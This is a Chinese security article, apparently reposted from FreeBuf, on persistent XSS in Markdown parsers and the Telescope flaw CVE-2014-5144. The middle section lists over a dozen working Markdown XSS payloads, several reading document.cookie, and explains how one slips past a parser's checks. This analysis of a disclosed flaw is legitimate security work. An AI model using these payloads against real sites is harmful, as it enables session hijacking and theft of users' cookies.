漏洞分析:一个Markdown解析器的持久型XSS漏洞

安全 应用安全 漏洞
Markdow解析器的安全现状如何?有没有对用户输入的数据做过滤?事实上,很多markdown解析器都没有过滤用户输入的数据,那么如果markdown被用于添加用户评论等功能的时候,就有可能存在安全风险。

什么是Markdown?

Markdown是一种轻量级的标记语言,流行程度已经得到了GitHub和Stack Overflow的广泛支持,作为普通人我们也可以轻松上手。

[[127667]]

用markdown来写文章非常赞,那些琐碎的HTML标签都可以抛到脑后不用管。最近5年内,markdown收到非常多的关注,包括Reddit,Github,StackOverflow在内的很多应用都使用 markdown这也催生了很多的markdown解析器的产生,这里定义了一些markdown语法,语法约定markdown解析器将这些标签解析为html标签。

漏洞分析:一个Markdown解析器的持久型XSS漏洞

Markdown安全现状

Markdown解析器的安全现状如何?有没有对用户输入的数据做过滤?

事实上,很多markdown解析器都没有过滤用户输入的数据,那么如果markdown被用于添加用户评论等功能的时候,就有可能存在安全风险。

这里有一些关于这个问题的讨论:[1], [2], [3].

另外,如果用googe搜索一下:

markdown xss issue site:github.com

漏洞分析:一个Markdown解析器的持久型XSS漏洞

你就会发现github上又很多***很高的项目都被发现存在XSS 漏洞。

所以,如何构造一些payload呢?看下面这些:

[a](javascript:prompt(document.cookie))
[a](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie))
![a](javascript:prompt(document.cookie))\
<javascript:prompt(document.cookie)>
<&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> 
![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)
![a&#039;"`onerror=prompt(document.cookie)](x)\
[citelol]: (javascript:prompt(document.cookie))
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[test](javascript://%0d%0aprompt(1))
[test](javascript://%0d%0aprompt(1);com)

上面这些payload是由Aleksa和原文作者一起搞出来的。在过去的12个月内,在实际渗透测试中证明,上面的这些 payload 是有效的。并且很多 markdown 解析器都受到影响。来看一下***一个payload:

[test](javascript://%0d%0aprompt(1);com)

我们猜测,markdown 解析器可能通过如下几个步骤来进行解析&转换:

判断时候有协议头?//有javascript 伪协议,Y

hostname 是以常见的域名后缀(com, org)结尾的?//是的,以 com 结尾 Y

将上述 payload 转换为 HTML 标签,//结果如下

  1. <a href="javascript://%0d%0aprompt(1);com>test</a> 

成功构造了一个XSS payload!当点击了上述链接后,就会触发XSS!

Telescope解析器一个持久性 XSS 漏洞(CVE-2014-5144)

Telescope是一个有名的开源项目,类似Reddit和Hackernews一样,提供一个社区功能。Telescope的一个解析帖子&评论的功能存在 XSS 漏洞,并且这个功能存在很久了!

在0.9.3之前的版本中,以上面的 payload 列表中的 payload 发帖或者发表评论,就可以导致一个XSS漏洞。该漏洞已经修复,Telescope在这里发了changelog:http://www.telesc.pe/blog/telescope-v093-dailyscope/

下面是漏洞对应的payload:

[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)

漏洞分析:一个Markdown解析器的持久型XSS漏洞 

漏洞分析:一个Markdown解析器的持久型XSS漏洞

注意:上述漏洞已经在Telescope >= 0.7.3版本中修复了。

责任编辑:蓝雨泪 来源: FreeBuf
相关推荐

2019-03-25 07:27:14

XSS漏洞Ecshop

2014-07-03 10:01:40

XSS漏洞存储型XSS漏洞

2013-11-27 17:12:27

2011-07-21 09:25:41

2022-10-20 11:00:52

SQL解析器

2020-12-22 10:29:43

漏洞SAML认证补丁

2019-07-05 08:39:39

GoSQL解析器

2009-05-07 19:02:44

2017-02-16 15:47:12

2021-03-08 10:49:11

漏洞攻击网络安全

2013-08-07 10:00:03

XSS谷歌

2017-02-14 10:20:43

Java Class解析器

2011-11-28 15:40:52

wiresharkRDP解析器

2013-04-17 17:07:40

2022-06-28 08:17:10

JSON性能反射

2014-05-15 09:45:58

Python解析器

2023-12-30 13:33:36

Python解析器JSON

2010-04-30 15:45:09

2016-03-03 14:29:15

2023-12-31 09:06:08

点赞
收藏

51CTO技术栈公众号